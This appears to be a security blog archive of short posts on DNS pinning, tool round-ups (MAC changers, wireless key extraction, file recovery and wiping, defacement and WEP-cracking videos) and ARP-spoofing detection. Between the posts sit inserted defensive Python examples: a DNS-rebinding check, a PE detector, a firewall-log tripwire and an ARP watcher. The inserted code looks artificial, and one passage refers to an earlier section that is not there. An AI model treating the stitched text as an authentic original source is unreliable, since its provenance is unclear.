    Exploiting games like this, as I'm sure the authors posit, is something that might not interest a lot of people, but should still be watched. Things like WoW (12 million users! This has become a social network in itself, really!) and Second Life bleed over into the real world, both in relationships with fellow people and business realms. But beyond that, the distributed worlds of gaming on such a large level will, just like the hardware gaming pushes, eventually find more mainstream uses. Being able to know these risks (like offloading some of the work to the client machines), at least just being aware of them, should prove useful someday.

    I'll get this book regardless, since I play WoW [0] and I've seen things in past games that exemplify the issues with cheating [1]. It helps a lot to know what is possible out there, and can put the whole gaming world/experience into more of a perspective. The book also looks like it will explore the issues that the game software presents to the users, for instance how far the game software can go in monitoring the user. Thankfully I run gaming on a separate box which does nothing but burn discs and run games, but I'm a rarity in that setup.

    [0] I have a 60 Warlock (main) and 60 Priest on Crushridge Alliance, and a 55 Shaman on Kul'Tiras Alliance. Obviously I've focused on the Shammy since BC.
    [1] Aimbots in Quake 1 (yes, some people earned money using them); farm bots in Diablo II/Battlenet.
    .: dns pinning: the grey area between web and network security
    Christian Matthies has posted up an explanation of DNS Pinning attacks. While this article is really cool and informative, there are a couple of caveats.

    First, this is a great article for people who already are familiar with DNS Pinning, since the author really throws out "Anti DNS Pinning" and "DNS Pinning" quite a lot, and it gets confusing which one he is actually talking about in each example. DNS Pinning is a behavior of a web browser to cache DNS requests until the window (or all windows of that browser) are closed. Any admin supporting DNS or web servers has experienced this behavior. "That should work...did you hit refresh? Oh wait, close all your browser windows first and retry. Yup, that did it!" Christian then explains a way to get around DNS Pinning so an attacker can redirect users without their knowledge by leveraging browser behavior and changes to DNS entries.

    Second, while several web security researchers would like to say this is a Big Deal, I consider this an exotic attack, yet. Christian mentions this can be used to attack internal servers, but that requires significant knowledge, and I don't think most corporations will have to care. Still, there is always the potential for something like this to become a common attack method in the future.

    The takeaways for this is to know what DNS Pinning means, what Anti DNS Pinning means, and that there is still a grey area firmly between network and web security when it comes to DNS manipulation.
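    One place where that grey area gets handled on the web side, as an added example that is not from Christian's article: the standard server-side mitigation for anti-DNS-pinning (DNS rebinding) against an internal web service is to check the Host header, because a rebound request still carries the attacker's hostname in Host even though the TCP connection has landed on the internal server. The hostnames and the allowlist below are constructed, and the WSGI app is a stand-in for whatever the internal service really is.

```python
"""Host-header check against anti-DNS-pinning (DNS rebinding).  Added
example, not code from the article; ALLOWED_HOSTS and the hostnames used
are constructed.  The idea: a browser that was rebound to this server
still sends the attacker's hostname in Host, so refuse anything that is
not a name or address this service is legitimately reached as."""
from urllib.parse import urlsplit

# Constructed allowlist: the names and addresses this service answers to.
ALLOWED_HOSTS = {"intranet.example.internal", "10.0.0.5"}

def host_is_trusted(host_header, allowed=ALLOWED_HOSTS):
    """True if the Host header names this service (port is ignored)."""
    if not host_header:
        return False
    try:
        # Reuse the URL parser so "host:port" and "[ipv6]:port" are handled.
        hostname = urlsplit("//" + host_header.strip()).hostname
    except ValueError:          # malformed bracketed literal and the like
        return False
    return hostname is not None and hostname.lower() in allowed

def app(environ, start_response):
    """Minimal WSGI app that refuses rebound requests before doing any work."""
    if not host_is_trusted(environ.get("HTTP_HOST", "")):
        start_response("421 Misdirected Request",
                       [("Content-Type", "text/plain")])
        return [b"unrecognised Host header\n"]
    start_response("200 OK", [("Content-Type", "text/plain")])
    return [b"internal page\n"]

def respond(host_header):
    """Drive the app with a constructed environ; return the status line."""
    captured = []
    app({"HTTP_HOST": host_header}, lambda status, headers: captured.append(status))
    return captured[0]

if __name__ == "__main__":
    for h in ("intranet.example.internal:8080", "10.0.0.5", "evil.attacker.test"):
        print(f"{h:35} -> {respond(h)}")
```

    Checking Host is cheap and catches the internal-server case the article describes; it does not help a service that is reached by bare IP from many different names, and it obviously requires that the internal service never be configured to accept an arbitrary Host.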
    .: exercise your brain with hypothetical incident response scenarios
    A few days ago I mentioned ddos mitigation. The referenced article [pdf] concerns UFIRT's actions in the face of a rather unique incident: a DDOS attack planned to occur in 1 week's time. Incident Response plans are important to a company's security posture, but not every imaginable incident needs to have an itemized response plan. And while issues like a DDOS likely should not be painstakingly planned out, it should at least be contemplated now and then as a sort of verbal/introspective exercise. What would you do in such a situation? Do you have extra resources, gear, or skills on your team to deal with an ad hoc incident like a DDOS? Do you know where to turn for help on short notice? Can you pull a Joe Stewart out of your back pocket? :) It might be a useful exercise for an IR team, or just for a manager or techie to sit back and think about some lazy afternoon...
    .: reading some more books
    I've been ramping up my studying lately, which has taken some time away from blogging (both reading them and writing some). I've also made headway into my huge list of "pending" items that both sit on my bathroom counter and in my email box.

    But I have found time to plug away at some more books. I've (finally!) started reading Tao of Network Security by Richard Bejtlich. I've put this book off way too long (I wanted more background into TCP/IP and Linux before tackling the book, or so I tell myself) and am finally getting into it. I really dig the tone and how Bejtlich presents the topics. Thankfully, the very academic first chapters were followed up by excellent later chapters that I found much more interesting (maybe because I already knew his positions and definitions from following his blog).

    Last night I also started reading Security Metrics by Andrew Jaquith. I really dig this guy's writing, and I was amazed by the opening tones of the book. First an opening by one of the most recognizable writing styles in security, Dan Geer, which is also visionary and almost prophetic. Just reading anything he writes feels weighty; old and dusty like an important magical tome hidden in some wizard's tower. Then into Jaquith's wonderful presentations. I think this book will go fast.

    Yes, I read multiple books at once. Sometimes I read novels which just require me and a chair. Other times technical books that pretty much require a computer nearby to follow along. I typically have two or three going at any given time, depending on my mood and the resources nearby. It is usually too much to be reading 2 hands-on books at a time, so I try to keep it mixed up with different flavors of books.
    .: pe hunter grabs windows executables off the wire
    Use Snort either on an active link or as a packet inspection tool after the fact? It might be useful to throw down PE Hunter to capture Windows binaries as they pass by. I can think of plenty of uses for this, not just in front of a honeypot, but in front of Internet-facing servers themselves. This is one of those detective tools that won't necessarily stop or prevent an attack, but can act as a watchguard for something evul going on, or to figure out what an attacker may have done on your network. The real usefulness of this tool won't be realized until it is used though. Who knows, maybe it will pick up too much junk from malware or software downloads and miss too much other stuff.

    Of note, no, I'm not all that great with Snort. It's on my medium-term project list, probably nearer the fall or winter before I can really dig my fingers into Snort more, even though I may have my own Snort box up in the next month or so just to get it up and familiarized.
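    The check a tool like PE Hunter has to make on a reassembled stream, as an added example that is not PE Hunter's own code: a Windows executable starts with the "MZ" DOS header, carries a 32-bit little-endian offset (e_lfanew) at 0x3C, and has the "PE\0\0" signature at that offset. The sample bytes, including the fake HTTP response wrapped around the file, are constructed, and the upper bound on e_lfanew is a heuristic of mine, not a format rule.

```python
"""Find Windows PE images in a byte stream: 'MZ' at the start, e_lfanew at
offset 0x3C, 'PE\\0\\0' at e_lfanew.  Added example, not PE Hunter's code.
The sample buffers are constructed; the 0x1000 bound on e_lfanew is a
sanity heuristic (real values are small) rather than part of the format."""
import struct

MZ = b"MZ"
PE_SIG = b"PE\0\0"
MAX_E_LFANEW = 0x1000    # heuristic: reject wild offsets that are clearly not headers

def find_pe_headers(data):
    """Return offsets in `data` where a plausible PE image begins."""
    hits = []
    start = 0
    while True:
        i = data.find(MZ, start)
        if i < 0:
            return hits
        # Need the full 64-byte DOS header to read e_lfanew at 0x3C.
        if i + 0x40 <= len(data):
            e_lfanew = struct.unpack_from("<I", data, i + 0x3C)[0]
            # The PE header must lie past the DOS header and inside the
            # buffer; otherwise this 'MZ' is just two letters in a stream.
            if 0x40 <= e_lfanew < MAX_E_LFANEW and \
                    data[i + e_lfanew:i + e_lfanew + 4] == PE_SIG:
                hits.append(i)
        start = i + 2

def build_fake_pe(e_lfanew=0x80, payload=b"\0" * 64):
    """Constructed buffer satisfying the check (not a runnable binary)."""
    buf = bytearray(MZ + b"\0" * (e_lfanew - 2))
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf += PE_SIG + payload
    return bytes(buf)

# Constructed: a fake PE behind a fake HTTP response, as a sniffer sees it.
SAMPLE_STREAM = (b"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\n\r\n"
                 + build_fake_pe())

if __name__ == "__main__":
    print("PE images at offsets:", find_pe_headers(SAMPLE_STREAM))
```

    On a live link the hard part is not this check but getting a correctly reassembled TCP stream to run it over, which is exactly why it makes sense to bolt it onto Snort rather than onto a raw packet capture; and, as noted above, expect it to pull in every legitimate software download as well.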
    .: untangle open sourced
    About half a year ago I posted about Untangle (and it has remained on my long-term projects list, sadly). I see they got some more press in ComputerWorld as they have turned their product open source. Sounds cool, and I still want to check it out on my home network someday (yeah, one of those projects that keeps getting pushed down...).
    .: hacking the verizon motorola razr v3c
    People often ask me how I like my Razr phone. I tell them it'd be a really nice phone...if I wasn't on Verizon. Yes, Verizon is well known for crippling their Razr's to the point where I really do only use it for phone calls and the occasional text message. In the past I have done minor adjustments like getting my own ringtones on the phone (text yourself a .wav file renamed to .mp3 and it will let it through, and play it as a .wav file properly). I've never delved too deeply into messing with it, being my first personally-owned cell phone. John Ward over at The Digital Voice has posted an awesome article about hacking the Razr, and he suffered from the same crippling issues from Verizon that I do. Since my contract is quite mature now and I'm more comfortable with pushing the line on my phone, I think I will make a note to try this stuff out. He's truly right that if I can unlock all this stuff in the article, the phone will take on a whole new level of use in my life. Funny how Verizon doesn't get that...
    .: smb4k, sinfp, xampp, ssl hell, cmd prompt call
    I've been going over some of the pending things in my todo lists. Here's a few things.

    I don't know of anything that can browse shares in Gnome on Ubuntu (Nautilus can using smb://server/share, but that requires knowing your target). So I installed smb4k which is available through Synaptic. Seems I needed a bunch of other stuff, including kdelibs. While smb4k is a KDE tool, it seems to run just fine in Gnome. It can be loaded from Applications->Accessories. The initial load will throw a non-terminating KWallet error, but then happily disables itself and continues. One bonus is the ability to manage and see existing mounts.

    If you see a system but aren't sure what OS it might be (if Windows, then you can try those fun admin shares!), you can check it out using an OS fingerprint tool. Yes, nmap and p0f are your typical choices, but SinFP might be a third option. I decided to try this on Windows and followed the instructions given. Everything seemed fine, but when I tried to fingerprint anything on my network, I typically was told I cannot fingerprint a closed or filtered port, even though I know it was open and allowed. Most of the time perl.exe would then spin and I'd have to kill it. Not sure what was going on, but might revisit it at some later date on Linux, perhaps. Regardless of the results of this tool, being able to know some of the differences that operating systems display in various packets and other behavior is some pretty fundamental and "not difficult" stuff. Being written in perl, it might be nice to read through this tool's signatures and techniques.

    XAMPP looks like a nice way to get a full complement of tools and applications for a web server set up quickly on either Linux or Windows (or others!). I've not tried this out as I wanted to do stuff manually with my latest build, but I might consider XAMPP in the future.

    Here is a snippet of a Dan Kaminsky presentation on SSL Hell at Toorcon. He talks about the bad things he has found about SSL through his huge scans of the Internet. I really dig that he admits security people can be wrong when trying to require SSL on every page. SSL can be intensive on servers and the hardware doesn't scale well with it. One thing I didn't like is a minor quibble. He points out that a lot of sites don't appear to use SSL (https) on their logins, but I'd like if he just said, "I sniffed this transaction to verify it wasn't secured underneath what I can see in my browser." He's probably correct in saying they were insecure, however.

    I can't remember where I found this originally, but I wanted to document it on my site for future reference. This reg script should add the ability to right-click any Windows folder and launch a cmd prompt at that location. Update: Looks like I maybe found it here.
    REGEDIT4

    [HKEY_CLASSES_ROOT\Directory\shell\DosHere]
    @="Command &Prompt:"

    [HKEY_CLASSES_ROOT\Directory\shell\DosHere\command]
    @="C:\\windows\\SYSTEM32\\cmd.exe /k cd \"%1\""

    [HKEY_CLASSES_ROOT\Drive\shell\DosHere]
    @="DOS &Prompt Here"

    [HKEY_CLASSES_ROOT\Drive\shell\DosHere\command]
    @="C:\\windows\\SYSTEM32\\cmd.exe /k cd \"%1\""
    .: windows mac changers, wifi tools, and firewalls
    There are a ton of different tools and ways to change your MAC address, let alone simply doing it manually. Here's a few I've accumulated notes about over the past 6 months. Macshift is a standalone C++ tool run via the command line. Does what it should do!

    Technitium is probably the Mercedes of mac changers, sporting tons of information in the GUI and also being scriptable.

    Smac is also an old favorite I see mentioned a lot, but the eval version is slightly limited. For such a small tool, I just don't believe in shelling out money for it.

    Speaking of Windows tools, Wirelesskeyview is a quick .exe (no installation required) that will pull out wireless network keys and display them for you. I'm sure these are just stored in a registry entry somewhere and, if encrypted at all, are like just rot13, but still this tool makes life easy.

    Heck, I'll stick with Windows for this whole post. The Windows firewall is still daunting to manage or maintain for most people, even those of us who are comfortable with firewalls! This kb article from Microsoft is surprisingly detailed. I especially like the last section on enabling and checking the logging of dropped packets. Combine this with a tail program and it might turn a spare WinXP box into a network tripwire-like device.
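    The "tail program" half of that tripwire idea, as an added example that is not from the Microsoft KB article: it parses pfirewall.log records by the #Fields header line the log carries, so the column layout is taken from the file rather than hard-coded, and flags any source that gets dropped on several distinct ports. The sample log lines are constructed, and the port threshold is an arbitrary choice.

```python
"""Windows firewall log as a tripwire: parse pfirewall.log by its #Fields
header, then flag sources dropped on several distinct ports.  Added
example, not from the KB article.  SAMPLE_LOG is constructed to follow
the W3C-style header format; min_ports is an arbitrary threshold."""
from collections import defaultdict
import time

# Constructed sample: one host sweeping SMB ports, one stray UDP packet,
# one legitimate outbound connection the firewall allowed.
SAMPLE_LOG = """\
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info
2007-07-10 09:00:01 DROP TCP 192.0.2.50 10.0.0.5 4321 135 48 S 1234567 0 65535 - - -
2007-07-10 09:00:01 DROP TCP 192.0.2.50 10.0.0.5 4322 139 48 S 1234568 0 65535 - - -
2007-07-10 09:00:02 OPEN TCP 10.0.0.5 10.0.0.7 1050 80 - - - - - - - -
2007-07-10 09:00:02 DROP TCP 192.0.2.50 10.0.0.5 4323 445 48 S 1234569 0 65535 - - -
2007-07-10 09:00:03 DROP UDP 198.51.100.8 10.0.0.5 53 137 78 - - - - - - -
""".splitlines()

def parse_firewall_log(lines):
    """Yield one dict per record, keyed by the names in the #Fields line."""
    fields = None
    for line in lines:
        line = line.rstrip("\r\n")
        if line.startswith("#Fields:"):
            fields = line.split()[1:]        # column names come from the file
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        yield dict(zip(fields, line.split()))

def dropped_by_source(records):
    """src-ip -> set of dst-ports that source was dropped on."""
    seen = defaultdict(set)
    for rec in records:
        if rec.get("action") == "DROP":
            seen[rec["src-ip"]].add(rec["dst-port"])
    return seen

def tripwire_alerts(lines, min_ports=3):
    """Sources dropped on at least `min_ports` distinct ports (sweep-like)."""
    seen = dropped_by_source(parse_firewall_log(lines))
    return sorted(ip for ip, ports in seen.items() if len(ports) >= min_ports)

def follow(path, poll=1.0):
    """The 'tail -f' part: yield new lines as the firewall appends them."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        fh.seek(0, 2)                       # start at the end, like tail -f
        while True:
            line = fh.readline()
            if line:
                yield line
            else:
                time.sleep(poll)

if __name__ == "__main__":
    print("alerts:", tripwire_alerts(SAMPLE_LOG))
```

    For a live box you would feed follow() on the log path into a small buffer and re-run tripwire_alerts over the last few minutes of records; the distinct-port count is deliberately crude, but it is enough to separate a sweep from the background noise of a single dropped packet.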

    Yesterday I posted a few OS fingerprinting tools. I missed one I had in my box called Satori. This looks like a quick effort that may not be regularly updated, but is a passive OS fingerprinter for a few OS types. I've not had a chance to try this out yet as my Windows machines at home are limited, but it might be fun to try, even if it doesn't make any toolboxes. A related paper on the site is also interesting.
    .: sysinternals tools in one download
    If you don't live on the Internet like I do, you might not know Sysinternals was "bought" by Microsoft (I'm not sure if it was actually bought or if Mark Russinovich just brought it along when he was hired by Microsoft). Now, you might know that, but did you know all those tools are offered in a single download now? Of particular note is ProcessMonitor which is a souped up version of Filemon/Regmon/ProcessExplorer. And if you don't know what Sysinternals is, well, I can't help you.
    .: freeundelete and restoration of deleted files
    Let's stick some more with Windows tools. A few years ago it became hip to wow friends and family with tools that would undelete or recover files long since gone from hard disks. This led to the eventual realization that old computers given away and drives lost or stolen could yield a lot of data if not properly wiped. If you ask me, if there is any doubt about whether a drive's contents are sensitive or not, just destroy the drive when it is decommissioned. (Besides, the powerful magnets inside the drives when disassembled make for fun toys for most anyone, if you want to score some points.)

    Anyway, FreeUndelete is a tool to recover files. Also, the oldie tool Restoration is still available for the same purpose.

    Oh, and PhotoRec is a tool to recover files from flash drives (and I bet other things!). This was described very well in an article on InformIT.

    You can use Eraser as a tool to better wipe files from a Windows system. Use it in conjunction with the recovery tools above to see the differences. For full disk wipes, I prefer the bootable DBAN disc.

    Of course there are more tools! Here's a quick list I pulled from a mailing list:
    OverWrite
    SecureDelete
    another Secure Delete
    WipeDisk
    AutoClave
    Wipe (Linux)
    and of course, shred for Linux, which should need no link.
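    What "see the differences" between the recovery and wiping tools boils down to, as an added example that is not code from any of the tools listed: an ordinary delete only drops the directory entry, the bytes stay in their blocks until something overwrites them, and a signature scan (the method carvers like PhotoRec use) finds them; an overwriting delete removes the evidence first. The block device below is a toy model I constructed, not a real filesystem; the JPEG start/end markers are the real ones.

```python
"""Toy block device showing why undelete works and why wiping defeats it.
Added example; not code from FreeUndelete, PhotoRec, Eraser or shred.
The disk model is constructed and deliberately simple (contiguous
allocation, no metadata); the JPEG markers are the real SOI/EOI bytes."""
BLOCK = 512
JPEG_SOI = b"\xff\xd8\xff"   # start of image
JPEG_EOI = b"\xff\xd9"       # end of image

class ToyDisk:
    def __init__(self, blocks=64):
        self.image = bytearray(BLOCK * blocks)   # the raw bytes a carver scans
        self.free = list(range(blocks))
        self.directory = {}                       # name -> list of block numbers

    def write(self, name, data):
        nblocks = -(-len(data) // BLOCK)          # ceiling division
        if nblocks > len(self.free):
            raise OSError("disk full")
        used = [self.free.pop(0) for _ in range(nblocks)]
        for n, b in enumerate(used):
            chunk = data[n * BLOCK:(n + 1) * BLOCK]
            self.image[b * BLOCK:b * BLOCK + len(chunk)] = chunk
        self.directory[name] = used

    def delete(self, name):
        """Ordinary delete: forget the entry, free the blocks, touch no data."""
        self.free.extend(self.directory.pop(name))

    def secure_delete(self, name, passes=1, pattern=b"\x00"):
        """Overwrite the file's blocks before releasing them (Eraser/shred idea)."""
        for b in self.directory[name]:
            for _ in range(passes):
                self.image[b * BLOCK:(b + 1) * BLOCK] = pattern * (BLOCK // len(pattern))
        self.delete(name)

def carve_jpegs(image):
    """Signature carving: return every SOI..EOI span found in the raw image."""
    found = []
    pos = 0
    while True:
        start = image.find(JPEG_SOI, pos)
        if start < 0:
            return found
        end = image.find(JPEG_EOI, start + len(JPEG_SOI))
        if end < 0:
            return found
        found.append(bytes(image[start:end + len(JPEG_EOI)]))
        pos = end + len(JPEG_EOI)

# Constructed stand-in for a photo: valid markers around filler bytes.
PHOTO = JPEG_SOI + b"\xe0" + b"A" * 700 + JPEG_EOI

def demo(secure):
    """Write, delete (plain or secure), then carve; return what a recovery tool sees."""
    disk = ToyDisk()
    disk.write("pic.jpg", PHOTO)
    if secure:
        disk.secure_delete("pic.jpg")
    else:
        disk.delete("pic.jpg")
    return carve_jpegs(disk.image)

if __name__ == "__main__":
    print("after plain delete, carved:", len(demo(secure=False)))
    print("after secure delete, carved:", len(demo(secure=True)))
```

    The model also shows the limit of carving: it only works while the file's blocks are contiguous and unreused, which is why recovery gets worse the longer a system keeps running after the delete, and why a free-space wipe (Eraser has one; DBAN just does the whole disk) is the thorough answer rather than per-file deletes.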
    .: security video round-up
    Videos are kinda cool. There are a bunch of them at Security-Freak demonstrating various tools and research. Scroll to the bottom to get past some of the topical videos and see common security tools demonstrated.

    Serapis and SecureVision released this web defacement video. This demonstrates how easy it can be to deface a website, especially after you become familiar with a particular method of attack. If you know an attack on the current phpBB version, for instance, the hard part is learning how to pull it off the first time. After that, downing 100 vulnerable instances is cake. I like this video, even though the music is maddeningly annoying. (Oh, and for anyone thinking about producing videos, I really don't like having to scroll up and down to see the whole screen...)

    You can't go wrong with a good ol' BackTrack2 WEP cracking video. There's a number of them out there, and for some reason I just like seeing them.

    This video doesn't load every time for me (Ubuntu+Firefox), but when it does, it gives a demonstration of finding and manipulating out an exploit.

    And the MPack demonstration video. The size is small, but still illustrates how web attack toolkits have gained traction.

    And, of course, I have other videos listed in the aptly named "videos" section on the left menu.
    .: using telnet to send email
    Note to self: use telnet for email more often than I do now, if nothing else then to just stay familiar with the syntax in a pinch.
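    The dialogue you type by hand over telnet to port 25, played out against a tiny in-memory server so the syntax can be rehearsed offline. This is an added example, not part of the original post; the server is a toy that implements only the commands shown (a real MTA does far more), and the hostnames and addresses are constructed.

```python
"""The manual SMTP conversation (HELO/EHLO, MAIL FROM, RCPT TO, DATA, '.',
QUIT) against a toy in-memory server.  Added example, not from the post.
The server is a constructed stand-in for a real MTA; hostnames and
addresses are constructed."""

class ToySmtpServer:
    """Just enough of the SMTP command set to accept one message."""
    def __init__(self, hostname="mail.example.test"):
        self.hostname = hostname
        self.in_data = False
        self.delivered = []          # (sender, recipients, body) per message
        self.reset()

    def reset(self):
        self.mail_from = None
        self.rcpt_to = []
        self.body = []

    def greeting(self):
        return f"220 {self.hostname} ESMTP ready"

    def handle(self, line):
        """Return the reply for one client line, or None inside DATA."""
        if self.in_data:
            if line == ".":                      # end of message
                self.in_data = False
                self.delivered.append((self.mail_from, list(self.rcpt_to),
                                       "\n".join(self.body)))
                self.reset()
                return "250 OK: queued"
            # Dot-stuffing: the client doubles a leading '.', we un-double it.
            self.body.append(line[1:] if line.startswith("..") else line)
            return None
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb in ("HELO", "EHLO"):
            return f"250 {self.hostname}"
        if verb == "MAIL" and arg.upper().startswith("FROM:"):
            self.mail_from = arg[5:].strip()
            return "250 OK"
        if verb == "RCPT" and arg.upper().startswith("TO:"):
            if self.mail_from is None:
                return "503 need MAIL first"
            self.rcpt_to.append(arg[3:].strip())
            return "250 OK"
        if verb == "DATA":
            if not self.rcpt_to:
                return "503 need RCPT first"
            self.in_data = True
            return "354 End data with <CR><LF>.<CR><LF>"
        if verb == "QUIT":
            return "221 bye"
        return "500 unrecognised command"

def send_message(server, sender, recipients, text, client="client.example.test"):
    """Client side: the commands in order.  Returns the transcript as
    (direction, line) pairs, i.e. what you would see in the telnet window."""
    transcript = [("S", server.greeting())]

    def cmd(line):
        transcript.append(("C", line))
        reply = server.handle(line)
        if reply is not None:
            transcript.append(("S", reply))
            if reply[0] in "45":                 # permanent or temporary failure
                raise RuntimeError(f"server rejected {line!r}: {reply}")

    cmd(f"EHLO {client}")
    cmd(f"MAIL FROM:<{sender}>")
    for r in recipients:
        cmd(f"RCPT TO:<{r}>")
    cmd("DATA")
    for line in text.splitlines():
        cmd("." + line if line.startswith(".") else line)   # dot-stuff
    cmd(".")
    cmd("QUIT")
    return transcript

if __name__ == "__main__":
    srv = ToySmtpServer()
    body = "From: me@example.test\nTo: you@example.test\nSubject: test\n\nhello"
    for who, line in send_message(srv, "me@example.test", ["you@example.test"], body):
        print(f"{who}: {line}")
```

    The two things that trip people up at a real telnet prompt are both in here: the headers (From:, To:, Subject:) are part of the DATA body, not separate commands, and a message line consisting of a single dot ends the message, which is why a line that really starts with a dot has to be sent with the dot doubled.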
    .: patch your windows boxes offline
    A few years ago Microsoft started offering free shipped cds containing security updates. Sadly, they didn't do this very long, but the ability to update systems locally was a blessing for my previous job where we didn't image our systems quite as much as I wanted to. Now I see Heise Security has an article detailing some scripts to build offline ISOs of patches. If you're like me and oftimes prefer the path of least resistance, Microsoft offers downloads of DVD ISOs as well. Woulda thunk!
    .: google to acquire postini
    I have heard today that Google is planning to acquire Postini. Hopefully they don't change Postini too much, since I've been a happy camper with them in my current job. Normally I don't report news news, but just wanted to make a quick post. Of course, I've been very happy with email service from Google as well as Postini, so it seems like a pretty strong match.
    .: are you really blocking im?
    Do you block IM at your company either via policy, via technical controls like firewall or web filters, or all of the above?

    Are you sure you're blocking IM?

    Let me remind you we're in what is gaggingly called the Web 2.0 years. Are you still certain about your answer?

    I've mentioned Meebo.com in the past as a web-based way to connect to all your favorite IM services. Yikes, that's scary enough to block in the firewall and filters, right? Well, now you can plop little plugins into blog services like Blogspot that will allow you to chat away with a friend. This is only a small skip (the hop, step, and jump have already been done!) away from being able to use outbound and inbound IM from any arbitrary website that you control.

    If you've not revisited the business cases for IM lately, you might want to do so and start realizing the IM is going to be as prevalent as cell phones (and phones in general) in our lives moving forward. There is little sense to fight that, but every sense to get your organization used to having a centralized IM system or centralized standards.

    PS: Yes, I saw this traffic because my IPS flagged it for me, thankfully.
    .: google and postini and a huge complex master plan
    I've seen a few postings lately musing about the Google/Postini marriage. It must be nice to have such rich and fertile material to pore and yell and talk over; like giving a hyper dog a large chewy bone to keep them occupied for hours upon hours at end while you try to get things done... Anyway, this is in response more towards Hoff/beaker than others he references.

    I don't think Google's plans are quite this grandiose (providing security, becoming an ASP-cum-ISP and providing some buzzword called "clean pipes..."), and I don't think they are going into security in itself, per se.

    Postini's offerings and customers fit exactly into what Google wants to do with Gmail and now Google Apps. This means they house even more content; content very personally and professionally relevant to its users and customers. They leverage content for advertising, and so on, which is a nice side-effect to providing SaaS for small-medium companies (or maybe the vice-versa is true!).

    Also, with Postini, they can control the upstream gateways for many other companies. So even if you don't let Google house your data over time, they can still scan it and gather content/information about you and your company to better leverage advertising and relevance.

    Besides, what is "secure" in housing one's important data at a third party? I don't much care if it is wrapped in SSL or POPS. Yes, security is part of it, but it is just a bullet point to get companies to take them more seriously as an alternative to Exchange/Lotus Notes/ISP mail service.

    I think, like people look at crimes, it is easy to take Google's plans way more complicated than they truly are. The simple answers are almost always the right ones, not the huge complex conspiracies that can be thought up. :)

    PS: Providing "clean pipes" sounds awfully nice and altruistic to the rest of us, but come on. Google went public. In going public, Google went from being altruistic and "not evil" to being ultimately self-serving towards itself and its stakeholders. It will only do "clean pipes" if it can be "evil" behind the scenes and profit from it...but I don't see that truly happening unless they offer up widespread wireless access and then leech all that rich personal data from all of us...evil, really. But I don't see that happening, really either.
    .: nasa hacker interview
    I'm not sure how real this interview is, but I really have zero reason to not buy it as real. Either way, an interesting insight into why "hackers/crackers" do what they do.
    .: blending web and network attacks with arp spoofing
    I like case studies. They're the real deal in comparison to the theoreticals of many articles. Neil Carpenter recently posted about web-borne malware that eventually led to lan arp poisoning and injection of iframes into web requests. This sort of stuff illustrates the new things we need to start thinking about when it comes to web security. A web attack against one user browsing stupid sites stupidly can result in your whole LAN being victimized; the next step in onesy-twosy hijackings from web pages. What is really cool is Neil followed that post up with another one discussing how to detect arp attacks like this.

    I had to take exception to his statement that "I'd also suspect that most IDS systems would catch this." That's correct, but I don't know of any IDS systems that would catch those and not throw hundreds of other false positives at the same time. It's common to initially tune an IDS to not detect ARP.

    So what else can you do to provide always-on detection of spoofed arp? You could set up a script to sniff and parse out arp requests relating to your gateways. These should be finite and quite manageable. Then whitelist out the combinations for your gateway. If you get different responses, flag and alert. This way you ignore all the other arps since they will likely be false positives anyway, and only alert on what you really care about: the gateway. I bet arpwatch or some other nix arp tools could be leveraged to assist in this.
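    The gateway-only ARP watcher just described, as an added example that is my code rather than Neil's or arpwatch's; it also covers the "arp watching" item on the dashboard wish list earlier on this page. It parses raw Ethernet/ARP frames, ignores every address that is not a listed gateway, and alerts only when a gateway IP shows up with a MAC other than the whitelisted one. The frames, MACs and addresses below are constructed; the sniff() function is the real AF_PACKET capture (Linux, root) and is the only part not exercised offline.

```python
"""Gateway ARP watch: alert only when a whitelisted gateway IP is claimed
by an unexpected MAC.  Added example, not code from the posts or from
arpwatch.  Frames and addresses are constructed; sniff() needs Linux and
root and is not run by the tests."""
import ipaddress
import struct

ETH_ARP = 0x0806
ARP_FMT = "!HHBBH6s4s6s4s"     # htype ptype hlen plen oper sha spa tha tpa
ARP_REPLY = 2

def parse_arp(frame):
    """Return (opcode, sender_mac, sender_ip) from an Ethernet/ARP frame, else None."""
    if len(frame) < 14 + 28:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, _tha, _tpa = \
        struct.unpack(ARP_FMT, frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):   # Ethernet/IPv4 only
        return None
    return oper, sha.hex(":"), str(ipaddress.IPv4Address(spa))

class GatewayWatch:
    def __init__(self, gateways):
        """gateways: {ip: expected MAC}; anything not listed is ignored on purpose."""
        self.gateways = {ip: mac.lower() for ip, mac in gateways.items()}

    def check(self, frame):
        """Return an alert string for a gateway impersonation, else None."""
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        oper, mac, ip = parsed
        expected = self.gateways.get(ip)
        if expected is None or mac == expected:
            return None
        kind = "reply" if oper == ARP_REPLY else "request"
        return f"ALERT gateway {ip} claimed by {mac} in ARP {kind}, expected {expected}"

def build_arp(oper, sender_mac, sender_ip, target_mac, target_ip):
    """Constructed frame, as a sniffer would hand it to check()."""
    def mac(s):
        return bytes.fromhex(s.replace(":", ""))
    eth = mac(target_mac) + mac(sender_mac) + struct.pack("!H", ETH_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, oper,
                      mac(sender_mac), ipaddress.IPv4Address(sender_ip).packed,
                      mac(target_mac), ipaddress.IPv4Address(target_ip).packed)
    return eth + arp

# Constructed whitelist: one gateway and the MAC it is supposed to have.
WATCH = GatewayWatch({"10.0.0.1": "00:11:22:33:44:55"})

def sniff(watch, iface="eth0"):
    """Linux only, needs root: read ARP frames off the wire and print alerts."""
    import socket
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_ARP))
    s.bind((iface, 0))
    while True:
        alert = watch.check(s.recv(65535))
        if alert:
            print(alert)

if __name__ == "__main__":
    spoofed = build_arp(ARP_REPLY, "de:ad:be:ef:00:01", "10.0.0.1",
                        "aa:bb:cc:dd:ee:01", "10.0.0.20")
    print(WATCH.check(spoofed))
```

    Because the whitelist is keyed by the gateway's IP, traffic from every other host on the segment never produces an alert, which is the whole point: a handful of gateway MACs is something you can keep correct by hand, whereas a full IP-to-MAC table for a DHCP network is not.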

